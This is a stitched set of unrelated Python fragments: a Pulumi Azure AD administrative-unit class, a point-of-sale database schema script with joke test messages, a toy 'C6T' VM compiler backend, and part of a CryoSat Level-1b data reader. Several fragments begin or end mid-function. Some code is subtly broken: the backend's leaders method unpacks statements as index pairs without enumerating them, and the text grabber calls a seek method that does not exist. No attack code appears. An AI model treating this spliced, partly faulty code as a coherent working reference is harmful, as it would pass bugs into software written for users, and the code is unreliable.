opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Administrative Unit within Azure Active Directory.
## API Permissions
The following API permissions are required in order to use this resource.
When authenticated with a service principal, this resource requires one of the following application roles: `AdministrativeUnit.ReadWrite.All` or `Directory.ReadWrite.All`
When authenticated with a user principal, this resource requires one of the following directory roles: `Privileged Role Administrator` or `Global Administrator`
## Import
Administrative units can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/administrativeUnit:AdministrativeUnit example 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param AdministrativeUnitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AdministrativeUnitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AdministrativeUnitArgs.__new__(AdministrativeUnitArgs)
__props__.__dict__["description"] = description
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["hidden_membership_enabled"] = hidden_membership_enabled
__props__.__dict__["members"] = members
__props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
__props__.__dict__["object_id"] = None
super(AdministrativeUnit, __self__).__init__(
'azuread:index/administrativeUnit:AdministrativeUnit',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
hidden_membership_enabled: Optional[pulumi.Input[bool]] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None) -> 'AdministrativeUnit':
"""
Get an existing AdministrativeUnit resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param | |
'''upc text primary key,
num_of_vendors integer default 0,
department text,
category text,
subcategory text,
location text,
material text,
postacct text,
unit_type text,
item_type text,
agepopup integer default 0,
posoptions text,
consignment integer default 0,
unitsinpackage integer default 1,
foodstampexempt integer default 0,
loyaltyexempt integer default 0,
deactivated integer default 0,
aisle_num text,
extra_places text,
section_num text,
closeout integer default 0'''
# --- Item-related tables (ITEMS db): create each table and seed a test row. ---
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc', "'TESTITEM'")
# POSoptions via JSON
# Prompt for Quantity = Y/N
# Assume 1 Sold = Y/N
# Prompt for Price, Quantity Calculated = Y/N
# Prompt for scale = Y/N
# Item Pricing Schemes table
table_name = 'item_pricing_schemes'
cols_list = '''name text primary key,
               scheme_list text,
               reduce_by text default "3"'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('name, scheme_list, reduce_by', "'1-3-10','1-3-10', '2.50'")
# Item Vendor Data
table_name = 'item_vendor_data'
cols_list = '''upc text primary key,
               vendor1_num text,
               vendor2_num text,
               vendor3_num text,
               vendor4_num text,
               vendor5_num text,
               vendor6_num text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
# JSON in each field
#
# - ordernum
# - prev_ordernum
# - lead_time
# - minimum_order
# - last_order
# - last_order_date
# - last_rec
# - last_rec_date
# - outstanding
# - units_in_order
## Item Notes
table_name = 'item_notes'
cols_list = '''upc text primary key,
               notes text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc, notes', "'TESTITEM','This here is a note for the Test Item'")
# Item POS Sales Links
table_name = 'item_sales_links'
cols_list = '''upc text primary key,
               sales_links text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc', "'TESTITEM'")
#JSON
# - item(#) large number of sales links associated with item
# - message
# Item Customer Instructions
table_name = 'item_cust_instructions'
# BUGFIX: the original declared "info_box, text," (stray comma), which SQLite
# parses as an untyped column `info_box` plus a bogus extra column `text`;
# it is a single text column like return_box/warranty_box.
cols_list = '''upc text primary key,
               print_info_options integer default 0,
               print_return_options integer default 0,
               print_warranty_options integer default 0,
               info_dialog text,
               return_dialog text,
               warranty_dialog text,
               info_box text,
               return_box text,
               warranty_box text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
info_message = 'Hello there, I see you bought the TestItem, Good Luck with that'
return_message = "Dont even think of returning this now that ive managed to get rid of it"
warranty_message = "There isnt one, even if there was, i certainly wouldnt tell you about it"
a.CreateTestItem('upc, info_box, return_box, warranty_box', f"'TESTITEM','{info_message}', '{return_message}', '{warranty_message}'")
# Item History: one row per item per year, monthly sales figures.
table_name = 'item_history'
cols_list = '''upc text primary key,
               year integer,
               january real,
               february real,
               march real,
               april real,
               may real,
               june real,
               july real,
               august real,
               september real,
               october real,
               november real,
               december real'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('upc, year, january', "'TESTITEM', 2021, 1.5")
############# Transaction Related Tables #####################
sql_file = '../db/TRANSACTIONS.sql'
# Transaction Ctrl Number
table_name = 'transaction_control'
cols_list = '''abuser text primary key,
trans_num integer'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('abuser, trans_num', "'rhp', 0")
# Transactions
table_name = 'transactions'
cols_list = '''transaction_id text,
date text,
salesperson integer,
time text,
cust_num text,
address_acct_num text,
upc text,
description text,
qty real,
avg_cost real,
unit_price real,
total_price real,
pricetree text,
discount text,
type_of_transaction text,
tax1 integer default 0,
tax2 integer default 0,
tax3 integer default 0,
tax4 integer default 0,
tax_never integer default 0,
tax_exempt integer default 0,
po_number text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
fieldnames = '''transaction_id, date, salesperson, time, cust_num, address_acct_num,
upc, description, qty, avg_cost, unit_price, total_price, pricetree, discount, type_of_transaction,
tax1, tax2, tax3, tax4, tax_never, tax_exempt, po_number'''
values = """'0', '20201016', '1', '10:10:00', '37047734', '',
'BEEFSTICK', 'Jack Links BeefStick',3, 0.65, 0.99, 2.97,'',0, 'SALE',
1, 1, 1, 1, 1, 1, 'Test PO'"""
a.CreateTestItem(fieldnames, values)
#Transaction Payments
table_name = 'transaction_payments'
cols_list = '''transaction_id text primary key,
paid real default 0.00,
discount_taken real default 0.00,
subtotal_price real default 0.00,
tax real default 0.00,
total_price real default 0.00,
paid_date text,
date text,
time text,
cust_num text,
address_acct_num text,
pay_method text,
change_back text,
type_of_transaction text,
cash_payment real,
check_payment real,
check_num text,
dl_number text,
phone_num text,
dob text,
charge real default 0.00,
card1_payment real default 0.00,
auth1_num text,
card1_type text,
card1_numbers text,
card2_payment real default 0.00,
auth2_num text,
card2_type text,
card2_numbers text,
card3_payment real default 0.00,
auth3_num text,
card3_type text,
card3_numbers text,
card4_payment real default 0.00,
auth4_num text,
card4_type text,
card4_numbers text,
card5_payment real default 0.00,
auth5_num text,
card5_type text,
card5_numbers text,
debit_payment real default 0.00,
auth6_num text,
debit_type text,
debit_numbers text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
#Transaction Notes
table_name = 'transaction_notes'
cols_list = '''station_num integer,
transaction_id text,
line_position text,
note text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
############## General Operations Related Tables ##############
sql_file = '../db/CONFIG.sql'
# Store info
table_name = 'basic_store_info'
cols_list = '''store_num integer primary key,
name text,
address1 text,
address2 text,
city text,
state text,
zip text,
phone1 text,
phone2 text,
fax text,
email text,
print_on_forms integer default 0,
late_charge real,
cust_id_title text,
penny_tally real,
website text,
logo text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem("store_num, name, address1, city, state, zip","0,'ABC Hardware','111 Hill St','Ipsum City','OH','45632'")
# POS Controls
table_name = 'pos_controls'
cols_list = '''store_num text primary key,
print_receipt_ondemand integer default 0,
prompt_for_qty integer default 0,
add_cust integer default 1,
add_items integer default 1,
payment_on_acct integer default 0,
verify_assigned_discounts integer default 0,
report_out_of_stock integer default 0,
print_signature_line integer default 1,
print_item_count integer default 1,
track_salesperson integer default 0,
mailing_list_capture integer default 0,
omit_discount_price integer default 0,
disable_open_drawer integer default 1,
omit_you_saved_line integer default 0,
no_alt_tax integer default 1,
notify_if_cost_gt_price integer default 1,
offer_on_hold_options integer default 1,
exclude_quotes integer default 0,
print_void_transactions integer default 0,
print_totals_on_logoff integer default 1,
prompt_for_cost integer default 0,
print_item_number integer default 0
'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num',"0")
# a = TableAware(table_name, sql_file, dbtype='sqlite3')
# a.AddField('print_receipt_ondemand', integer=11, defaults=0)
# a.AddField('prompt_for_qty', integer=11, defaults=0)
# a.AddField('add_cust', integer=11, defaults=0)
# a.AddField('add_items', integer=11, defaults=0)
# a.AddField('payment_on_acct', integer=11, defaults=0)
# a.AddField('verify_assigned_discounts', integer=11, defaults=0)
# a.AddField('report_out_of_stock', integer=11, defaults=0)
# a.AddField('disable_credit_security', integer=11, defaults=0)
# a.AddField('print_signature_line', integer=11, defaults=0)
# a.AddField('skip_finished_question', integer=11, defaults=0)
# a.AddField('print_item_count', integer=11, defaults=0)
# a.AddField('track_salesperson', integer=11, defaults=0)
# a.AddField('mailing_list_capture', integer=11, defaults=0)
# a.AddField('disable_open_drawer', integer=11, defaults=0)
# a.AddField('dept_totals_by_drawer', integer=11, defaults=0)
# a.AddField('omit_cust_addr', integer=11, defaults=0)
# a.AddField('print_totals_on_logoff', integer=11, defaults=0)
# a.AddField('save_cleared_totals_to_reconcile', integer=11, defaults=0)
# a.AddField('verify_parts_explosion', integer=11, defaults=0)
# a.AddField('display_parts_explosion', integer=11, defaults=0)
# a.AddField('print_kit_parts', integer=11, defaults=0)
# a.AddField('print_kit_parts_price', integer=11, defaults=0)
# a.AddField('discount_omit_price', integer=11, defaults=0)
# a.AddField('trap_zips', integer=11, defaults=0)
# a.AddField('prompt_for_cost', integer=11, defaults=0)
# a.AddField('print_item_num', integer=11, defaults=0)
# a.AddField('support_eos_discount', integer=11, defaults=0)
# a.AddField('no_alt_tax', integer=11, defaults=0)
# a.AddField('notify_if_cost_gt_price', integer=11, defaults=0)
# a.AddField('omit_you_saved_line', integer=11, defaults=0)
# a.AddField('offer_on_hold_options', integer=11, defaults=0)
# a.AddField('print_void_trans', integer=11, defaults=0)
# a.AddField('exclude_layaways', integer=11, defaults=0)
# a.AddField('exclude_orders', integer=11, defaults=0)
# a.AddField('exclude_quotes', integer=11, defaults=0)
# a.AddField('exclude_hold', integer=11, defaults=0)
# POS Messages
table_name = 'pos_messages'
cols_list = '''abuser text primary key,
conditions text,
return_policy text,
warranty text,
charge_agreement text,
credit_card_agreement text,
thanks text,
check_policy text,
layaway_policy text,
gift_loyalty text,
special_event text'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
return_policy='30 Day Return, Package unopened, item unused'
charge_agree='You agree to pay in full every month before the 30th'
cc_agree='The way of the future, Hooray for a cashless society'
thanks='Thank you for your business'
check_policy='Nope, no thanks, never, NO CHECKS!!!!'
a.CreateTestItem('abuser, return_policy, charge_agreement, credit_card_agreement, thanks, check_policy', f"'rhp','{return_policy}','{charge_agree}','{cc_agree}','{thanks}','{check_policy}'")
# Store Closing Options
table_name = 'store_closing_options'
cols_list = '''store_num integer,
combined_trans_detail integer default 0,
trans_by_pay_type integer default 0,
trans_by_salesperson integer default 0,
trans_by_drawer integer default 1,
tax_audit_report integer default 0,
item_sales_by_deptcat integer default 0,
deptcat_option integer default 0,
exit_after_closing integer default 0,
do_not_print_hardcopy integer default 0'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num','0')
table_name = 'reports_closing_daily'
cols_list = '''store_num integer primary key,
all_transactions integer default 1,
cash_drawer_totals integer default 1,
customer_invoiced integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_weekly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top10 integer default 1,
inventory_loser10 integer default 1,
inventory_most_requested integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_monthly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top50 integer default 1,
inventory_losers50 integer default 1,
inventory_most_requested integer default 1,
tax_report integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_quarterly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top100 integer default 1,
inventory_losers100 integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'reports_closing_yearly'
cols_list = '''store_num integer primary key,
sales_breakdown integer default 1,
inventory_top250 integer default 1,
inventory_losers250 integer default 1'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
## Payment Methods
table_name = 'payment_methods'
cols_list = '''store_num integer primary key,
cash integer default 1,
checks integer default 1,
charge integer default 0,
credit_card integer default 1,
debit_card integer default 1,
food_stamps integer default 0,
foreign_stamps integer default 0,
loyalty_card integer default 0
'''
a = Tabling(table_name, cols_list, sql_file)
a.CreateTable()
a.CreateTestItem('store_num', "0")
table_name = 'tax_tables'
cols_list = '''tax_name text primary key,
GLsub integer default 000,
RNDscheme integer default 0,
APscheme integer default 0,
no_pennies_rounding integer default 0,
min_sale real default 0.00,
max_sale real default 0.00,
item_max real default 0.00,
from_amt0 real default 0.00,
tax_rate0 real default 0.00000,
from_amt1 real default 0.00,
tax_rate1 real default 0.00000,
from_amt2 real | |
<filename>backend/backend.py
"""C6T VM codegen backend.
"""
import re
import collections.abc
from collections import deque
from ctypes import Union  # noqa: F401 -- legacy import; typing.Union below shadows it (annotations need typing's Union)
from string import whitespace
from typing import (Any, Callable, Deque, Dict, Iterable, Iterator, List,
                    Optional, Tuple, Union, overload)
class ValType:
    """Base class for the C6T value types (int, char, float, double)."""


class IntType(ValType):
    """C6T integer type."""


class CharType(ValType):
    """C6T character type."""


class FltType(ValType):
    """C6T float type."""


class DblType(ValType):
    """C6T double type."""
class Flags(collections.abc.MutableMapping):
    """A mapping of named boolean flags that fall back to a default.

    Reading a flag that was never set returns ``default`` without
    creating an entry.  Flags may also be read and written as
    attributes (``flags.has_effect``).
    """

    def __init__(self, default: bool, **kwargs) -> None:
        super().__init__()
        if not isinstance(default, bool):
            raise TypeError("default value must be a bool")
        self.default = default
        self.flags = {}
        # BUG FIX: every keyword used to be stored as True, ignoring its
        # actual value (Flags(False, quiet=False) recorded quiet=True).
        for name, value in kwargs.items():
            self[name] = value

    def __delitem__(self, key: str) -> None:
        del self.flags[key]

    def __getitem__(self, key: str) -> bool:
        # Unset flags report the default value.
        if key in self.flags:
            return self.flags[key]
        return self.default

    def __setitem__(self, key: str, value: bool) -> None:
        if not isinstance(value, bool):
            raise TypeError("Flag values must be bools")
        self.flags[key] = value

    def __iter__(self) -> Iterator[str]:
        # Only explicitly-set flags are enumerated.
        return iter(self.flags)

    def __len__(self) -> int:
        return len(self.flags)

    def __getattr__(self, name: str) -> bool:
        # Reached only when normal attribute lookup fails.  Route flag
        # names through the mapping so the default applies (the old
        # version raised KeyError for unset flags, and recursed
        # infinitely during __init__ before 'flags' existed).
        if name in ('default', 'flags'):
            raise AttributeError(name)
        return self[name]

    def __setattr__(self, name: str, value: Any) -> None:
        # BUG FIX: 'default' and 'flags' are real instance attributes.
        # The old version also pushed them through __setitem__, which
        # touched self.flags before it existed and caused infinite
        # recursion (RecursionError) on every construction.
        if name in ('default', 'flags'):
            super().__setattr__(name, value)
        else:
            self[name] = value
class Opcode:
    """A C6T opcode representation, with information on its properties.

    Attributes:
        code: the opcode mnemonic
        stk_args: number of operands popped from the expression stack
        inline_args: number of inline (immediate) arguments
        flags: opcode property flags, defaulting to False
    """

    def __init__(self, code: str, stk_args: Optional[int] = None,
                 inline_args: Optional[int] = None, **flags) -> None:
        # None means zero arguments of either kind.  (The old
        # annotations said `int = None`, an implicit-Optional that
        # PEP 484 disallows.)
        self.code = code
        self.stk_args = 0 if stk_args is None else stk_args
        self.inline_args = 0 if inline_args is None else inline_args
        self.flags = Flags(False, **flags)

    def build(self, stack: Deque, inline_args: Optional[list] = None):
        """Create the representation of the opcode.

        Base implementation does nothing; subclasses pop/push *stack*
        and may return a Statement.
        """
        return None
class Leaf:
    """Base class for a C6T leaf value (constant or memory cell)."""


class FramePointer(Leaf):
    """Representation of the frame pointer."""

    def __str__(self) -> str:
        return "fp"


class MemoryCell(Leaf):
    """Base class for C6T memory cells."""


class Register(MemoryCell):
    """The value at the given register number."""

    def __init__(self, regnum: int) -> None:
        super().__init__()
        self.regnum = regnum

    def __str__(self) -> str:
        return f"reg{self.regnum}"


class Static(MemoryCell):
    """A static (named) C6T memory cell."""

    def __init__(self, name: str):
        self.name = name

    def __str__(self) -> str:
        return self.name


class Con(Leaf):
    """A C6T integer constant."""

    def __init__(self, value: int):
        self.value = value

    def __str__(self) -> str:
        return str(self.value)


class Temp(MemoryCell):
    """A C6T temporary memory cell with a class-wide running index."""

    # Next index to hand out; shared by all instances.
    cur_index = 0

    def __init__(self):
        self.index = self.__class__.cur_index
        self.__class__.cur_index += 1

    @classmethod
    def reset(cls):
        """Reset the index of all temporaries.

        FIX: was an instance method that only touched class state;
        as a classmethod it works both as Temp.reset() and t.reset().
        """
        cls.cur_index = 0
class Node:
    """A C6T expression-tree node built from an opcode and its operands.

    Pops ``opcode.stk_args`` operands off *stack*, preserving their
    original push order in ``children``, and records *args* as the
    inline arguments.

    FIX: the class previously defined two ``__init__`` methods, the
    first decorated with ``@overload``; at runtime the second simply
    shadowed the first, so the overload variant was dead code (and
    ``typing.overload`` is only meant for stub signatures anyway).
    Annotations referencing project types are quoted so they are not
    eagerly evaluated at class-definition time.

    Raises:
        ValueError: wrong number of inline arguments for the opcode
        ValueError: not enough stack arguments for the opcode
    """

    def __init__(self, opcode: "Opcode", stack: deque,
                 args: "Optional[list]" = None) -> None:
        if args is None:
            args = []
        self.opcode = opcode
        self.children: list = []
        if len(args) != opcode.inline_args:
            raise ValueError(
                f"Not enough inline arguments (need {opcode.inline_args}, have {len(args)})")
        self.args = args
        if len(stack) < opcode.stk_args:
            raise ValueError(
                f"Not enough stack arguments (need {opcode.stk_args}, have {len(stack)})")
        for _ in range(opcode.stk_args):
            # insert(0, ...) keeps children in original push order.
            self.children.insert(0, stack.pop())
        # Register allocated for this node's result, if any.
        self.regnum: "Union[None, int]" = None
class Statement:
"""A C6T VM statement node.
"""
def __init__(self, statecode: str):
self.statecode = statecode
class Move(Statement):
"""Statement to compute an expression and store its value.
"""
def __init__(self, dest: Union[Leaf, Node], expr: Union[Node, Leaf], dest_type: ValType):
super().__init__('move')
self.dest = dest
self.expr = expr
self.dest_type = dest_type
class Eval(Statement):
"""Compute an expression and ignore the result.
"""
def __init__(self, expr: Union[Node, Leaf]):
super().__init__('eval')
self.expr = expr
class Jump(Statement):
"""Jump unconditionall to an address.
"""
def __init__(self, target: Union[Node, Leaf]):
super().__init__('jump')
self.target = target
class Brz(Statement):
"""Compute an expression and jump to the address if the expression is 0.
"""
def __init__(self, expr: Union[Node, Leaf], target: Leaf):
super().__init__('brz')
self.expr = expr
self.target = target
class Label(Statement):
"""Define a label here.
"""
def __init__(self, name: str):
super().__init__('label')
self.name = name
class SeqState(Statement):
"""Perform multiple statements in order.
"""
def __init__(self, *statements: Statement):
super().__init__('seq')
self.statements = list(statements)
def __iter__(self):
for statement in self.statements:
if isinstance(statement, SeqState):
for substate in statement:
yield substate
else:
yield statement
def __len__(self):
return len(list(self))
def leaders(self) -> Iterable[int]:
"""Returns iterable of the indexes of all statements.
"""
next_is_leader = False
for index, statement in list(self):
leader = None
if next_is_leader:
leader = index
if index == 0:
leader = index
if isinstance(statement, (Brz, Jump)):
next_is_leader = True
if isinstance(statement, Label):
leader = index
else:
next_is_leader = False
if leader is not None:
yield leader
def basic_blocks(self) -> Iterable[List[Statement]]:
"""Iterator over all basic blocks.
"""
statements = list(self)
leaders = list(self.leaders())
while len(leaders) > 2:
leader = leaders.pop(0)
tail = leaders[0]
yield statements[leader:tail]
if len(leaders) > 1:
yield statements[leaders[0]:]
class StkOp(Opcode):
    """An opcode that performs pure stack operations."""

    def build(self, stack: deque, inline_args: Optional[list] = None) -> None:
        """Pop this opcode's operands and push the resulting expression node.

        Node() itself pops the operands from *stack* before the new
        node is appended.
        """
        args = [] if inline_args is None else inline_args
        node = Node(self, stack, args)
        stack.append(node)
        return None
class LexName:
    """A lexical token naming an assembler symbol."""

    def __init__(self, name: str) -> None:
        # The token's identifier text.
        self.name = name
class PushOp(Opcode):
    """Opcode to push a literal value onto the expression stack."""

    def __init__(self) -> None:
        super().__init__('push', 0, 1)

    def build(self, stack: Deque, inline_args: Optional[list] = None):
        """Push the single inline literal; LexName tokens become Statics.

        Raises:
            ValueError: wrong number of inline arguments
        """
        if inline_args is None:
            # FIX: len(None) raised TypeError when called with the default.
            inline_args = []
        if len(inline_args) != self.inline_args:
            raise ValueError("Not enough inline args")
        literal = inline_args[0]
        if isinstance(literal, LexName):
            # Symbol tokens are pushed as static memory references.
            literal = Static(literal.name)
        # BUG FIX: previously pushed inline_args[0], silently discarding
        # the LexName -> Static conversion just computed above.
        stack.append(literal)
        return None
# Binary arithmetic stack opcodes: each pops two operands and pushes
# one result node.
add_op = StkOp('add', 2)
sub_op = StkOp('sub', 2)
class PushframeOp(Opcode):
    """Opcode to push an address relative to the frame pointer."""

    def __init__(self) -> None:
        super().__init__('pushframe', 0, 1)

    def build(self, stack: Deque, inline_args: Optional[list] = None):
        """Push fp and the inline offset, then fold them with 'add'.

        Raises:
            ValueError: wrong number of inline arguments
        """
        if inline_args is None:
            # FIX: len(None) raised TypeError when called with the default.
            inline_args = []
        if len(inline_args) != self.inline_args:
            raise ValueError("Not enough inline args")
        stack.append(FramePointer())
        stack.append(inline_args[0])
        # Combine the two pushes into a single fp+offset expression node.
        return add_op.build(stack)
class JmpOp(Opcode):
    """Opcode for an unconditional jump to a named label."""

    def __init__(self) -> None:
        super().__init__('jmp', 0, 1)

    def build(self, stack: Deque, inline_args: Optional[list] = None) -> Jump:
        """Return a Jump statement targeting the inline label name.

        Raises:
            ValueError: wrong number of inline arguments
        """
        if inline_args is None:
            # FIX: len(None) raised TypeError when called with the default.
            inline_args = []
        # BUG FIX: the old check compared against self.stk_args (0), so
        # the required single inline argument was always rejected.
        if len(inline_args) != self.inline_args:
            raise ValueError("Not enough inline arguments.")
        return Jump(Static(inline_args[0]))
class MoveOp(Opcode):
    """Opcode that stores a computed value into a target location."""

    def __init__(self, code: str, dest_type: ValType) -> None:
        super().__init__(code, 2, 0)
        # Type of value held at the destination.
        self.dest_type = dest_type

    def build(self, stack: Deque, inline_args: Optional[list] = None) -> Move:
        """Pop destination then expression (destination was pushed last).

        Raises:
            ValueError: fewer than two stack operands available
        """
        if len(stack) < self.stk_args:
            raise ValueError("Not enough stack arguments")
        # Tuple RHS evaluates left to right: first pop is the destination.
        dest, expr = stack.pop(), stack.pop()
        return Move(dest, expr, self.dest_type)
class BrzOp(Opcode):
    """Opcode: branch to a label if the popped expression is zero."""

    def __init__(self) -> None:
        super().__init__('brz', 1, 1)

    def build(self, stack: Deque, inline_args: Optional[list] = None) -> Brz:
        """Return a Brz statement from the stack top and inline label.

        Raises:
            ValueError: missing stack operand or inline argument
        """
        if inline_args is None:
            # FIX: len(None) raised TypeError when called with the default.
            inline_args = []
        if len(stack) < self.stk_args:
            raise ValueError("Not enough stack args")
        if len(inline_args) != self.inline_args:
            raise ValueError("Not enough inline args")
        # BUG FIX: used popleft(), taking the *oldest* stack entry; every
        # other opcode (MoveOp, StkJmp, Node) consumes the top via pop().
        return Brz(stack.pop(), Static(inline_args[0]))
class StkJmp(Opcode):
    """Opcode jumping to a computed (stack-evaluated) address."""

    def __init__(self) -> None:
        super().__init__('stkjmp', 1, 0)

    def build(self, stack: Deque, inline_args: Optional[list] = None) -> Jump:
        """Pop the target expression and wrap it in a Jump statement.

        Raises:
            ValueError: no stack operand available
        """
        if len(stack) < self.stk_args:
            raise ValueError("Not enough stack args")
        target = stack.pop()
        return Jump(target)
class ClearOp(Opcode):
    """Opcode that discards the entire expression stack."""

    def __init__(self) -> None:
        super().__init__('clear', 0, 0)

    def build(self, stack: Deque, inline_args: Optional[list] = None):
        """Empty the stack; produces no statement."""
        stack.clear()
        return None
def for_effect(node: "Union[Leaf, Node]") -> "list[Union[Leaf, Node]]":
    """Recursively collect the subtrees that must still be computed for
    their side effects when the overall result is discarded.

    Returns [node] itself if its opcode is flagged has_effect;
    otherwise the effectful subtrees of its children.  A Leaf (or any
    non-Node) contributes nothing.

    FIX: annotations are quoted so they are not eagerly evaluated at
    definition time (with this file's ``from ctypes import Union`` the
    old eager ``list[Union[...]]`` subscription broke at import).
    """
    if not isinstance(node, Node):
        return []
    if node.opcode.flags.has_effect:
        return [node]
    effectful = []
    for child in node.children:
        effectful.extend(for_effect(child))
    return effectful
# Character-class fragments used to build the assembler token regexes.
RE_ALPHA = r"([a-zA-Z_.])"  # one identifier character (letter, '_', '.')
RE_NUM = r"(\d)"  # one decimal digit
RE_ALPHANUM = r"(("+RE_ALPHA+r")|("+RE_NUM+r"))"
# A label/name: an identifier character followed by identifier chars or digits.
RE_LABEL = r"(?P<label>"+RE_ALPHA+RE_ALPHANUM+r"*)"
RE_NAME = r"(?P<name>"+RE_ALPHA+RE_ALPHANUM+r"*)"
# NOTE(review): matches a single digit only -- multi-digit constants appear
# unsupported here; confirm whether this should be RE_NUM + r"+".
RE_CON = r"(?P<con>"+RE_NUM+r")"
class Grabber:
"""Allows text to be grabbed.
"""
def __init__(self, text: str):
self.text = text
self.__index = 0
def __iter__(self) -> Iterator[str]:
return self
def bounds(self) -> None:
"""Makes sure our index >= 0.
"""
self.__index = max(0, self.__index)
def grab(self, count: int = 1) -> str:
"""Return the next count characters from me.
"""
old_index = self.__index
self.__index += count
return self.text[old_index:old_index+count]
def __next__(self) -> str:
return self.grab(1)
def match(self, pattern: str) -> Union[str, None]:
"""Try to match against a given regular expression.
"""
match = re.match(pattern, self.text[self.__index:])
if match is None:
return None
self.seek(len(match[0]))
return match[0]
def match_any(self, *args: Tuple[str, str]) -> Union[Tuple[str, str], None]:
"""Try to match, in order, the given arguments. Returns the one
matched, or None of none matched. Ends on the first match.
"""
for name, pattern in args:
match = self.match(pattern)
if match is not None:
return | |
variables
if isinstance(val, dict):
# for each waveform beam variable
for k,v in val.items():
# scale variable
CS_L1b_mds[group][key][k] = CS_l1b_scale[group][key][k]*v.copy()
else:
# scale variable
CS_L1b_mds[group][key] = CS_l1b_scale[group][key]*val.copy()
# calculate GPS time of CryoSat data (seconds since Jan 6, 1980 00:00:00)
# from TAI time since Jan 1, 2000 00:00:00
GPS_Time = self.calc_GPS_time(CS_L1b_mds['Location']['Day'],
CS_L1b_mds['Location']['Second'], CS_L1b_mds['Location']['Micsec'])
# leap seconds for converting from GPS time to UTC time
leap_seconds = self.count_leap_seconds(GPS_Time)
# calculate dates as J2000 days (UTC)
CS_L1b_mds['Location']['days_J2k'] = (GPS_Time - leap_seconds)/86400.0 - 7300.0
# parameters to extract
if field_dict is None:
field_dict = self.__default_field_dict__()
# extract fields of interest using field dict keys
for group,variables in field_dict.items():
for field in variables:
if field not in self.fields:
self.fields.append(field)
setattr(self, field, CS_L1b_mds[group][field])
# update size and shape of input data
self.__update_size_and_shape__()
# return the data and header text
return self
def from_nc(self, full_filename, field_dict=None, unpack=False, verbose=False):
    """
    Read CryoSat Level-1b data from netCDF4 format data

    Parses product metadata from the file name, reads the Baseline-D
    netCDF payload, converts TAI times to GPS/UTC, and copies the
    requested variables onto the object as attributes.

    Arguments:
        full_filename: path to the netCDF4 granule
        field_dict: {group: [variable, ...]} mapping of fields to
            extract (default: __default_field_dict__())
        unpack: passed through to cryosat_baseline_D
        verbose: print the file name being read
    """
    # file basename and file extension of input file
    fileBasename, fileExtension = os.path.splitext(os.path.basename(full_filename))
    # CryoSat file class
    # OFFL (Off Line Processing/Systematic)
    # NRT_ (Near Real Time)
    # RPRO (ReProcessing)
    # TEST (Testing)
    # TIxx (Stand alone IPF1 testing)
    # LTA_ (Long Term Archive)
    regex_class = 'OFFL|NRT_|RPRO|TEST|TIxx|LTA_'
    # CryoSat mission products (see product handbook for full list):
    # SIR1SAR_FR/SIR2SAR_FR: Level 1 FBR SAR Mode (Rx1/Rx2 Channel)
    # SIR_SIN_FR: Level 1 FBR SARin Mode
    # SIR_LRM_1B: Level-1 Product Low Rate Mode
